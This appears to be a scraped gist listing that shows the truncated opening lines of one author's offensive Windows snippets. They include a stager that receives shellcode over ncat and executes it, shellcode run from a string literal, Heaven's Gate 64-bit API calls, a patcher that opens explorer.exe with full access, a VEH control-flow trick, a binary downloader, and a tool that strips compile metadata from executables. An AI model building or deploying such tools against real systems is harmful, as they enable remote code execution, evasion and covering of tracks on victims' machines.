import pefile, struct, sys | |
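# Command-line guard: the script expects exactly one argument (the path to the
# executable to process). Anything else prints the banner plus usage and exits.
if len(sys.argv) != 2:
    # Plain literal: the original used an f-string with no placeholders.
    print("Strip your personal compile info from Exe Files by aaaddress1@chroot.org")
    print(f"Usage: {sys.argv[0]} [path/to/exe]")
    # Non-zero status so callers/scripts can detect the bad invocation.
    sys.exit(-1)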
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402 | |
def mask_myRichHdr(in_pefile): | |
DANS = 0x536E6144 # 'DanS' as dword |
// iThome 2020 Demo: Signature Patcher for Explorer | |
// author: aaaddress1@chroot.org | |
#include <iostream> | |
#include <Windows.h> | |
int main() { | |
DWORD explorer_pid; | |
GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid); | |
if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) { |
// VEH Monitor by aaaddress1@chroot.org
#include <stdio.h> | |
#include <windows.h> | |
#pragma warning( disable : 4996 ) | |
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) { | |
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000)) | |
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000; | |
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
return EXCEPTION_CONTINUE_SEARCH; |
// using WinHTTP to obtain binary data (MSVC) | |
// by aaaddress1@chroot.org | |
#include <vector> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <Winhttp.h> | |
#pragma comment(lib, "winhttp") | |
using namespace std; | |
vector<char>* httpRecv(const wchar_t url[]) { |
// memcpy 32bit by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
int main(void) { | |
int dummy(0x41414242); | |
char buf[8] = {0}; | |
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
puts(buf); |
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
// by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
typedef struct _PEB_LDR_DATA64 | |
{ | |
ULONG Length; | |
BOOLEAN Initialized; | |
ULONG64 SsHandle; |
// get 64 bit Windows API in pure 32 bit mode! | |
// it's necessary to disable all compiler optimizations if you're using MSVC.
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
// by aaaddress1@chroot.org | |
#include <iostream> | |
#include <stdio.h> | |
#include <windows.h> | |
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
#include "wow64ext.h" |
# x96_shellcode.py | |
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
# by aaaddress1@chroot.org | |
''' | |
entry: | |
call $+5 | |
mov ax, cs | |
sub ax, 23h | |
je retTo32b | |
nop |
// simple stager, by aaaddress1@chroot.org | |
// using ncat to send shellcode payload, recv & execute. | |
#include <WS2tcpip.h> | |
#include <stdio.h> | |
#include <shlobj.h> | |
#include <Windows.h> | |
#include <shlwapi.h> | |
#include <winsock2.h> | |
#pragma warning(disable:4996) | |
#pragma comment(lib, "ws2_32.lib") |
// ETW CLR Tracker, by aaaddress1@chroot.org | |
// rewrite from post "Hiding your .NET - ETW" | |
// URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
#define AssemblyDCStart_V1 155 | |
#define AssemblyLoad_V1 154 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> |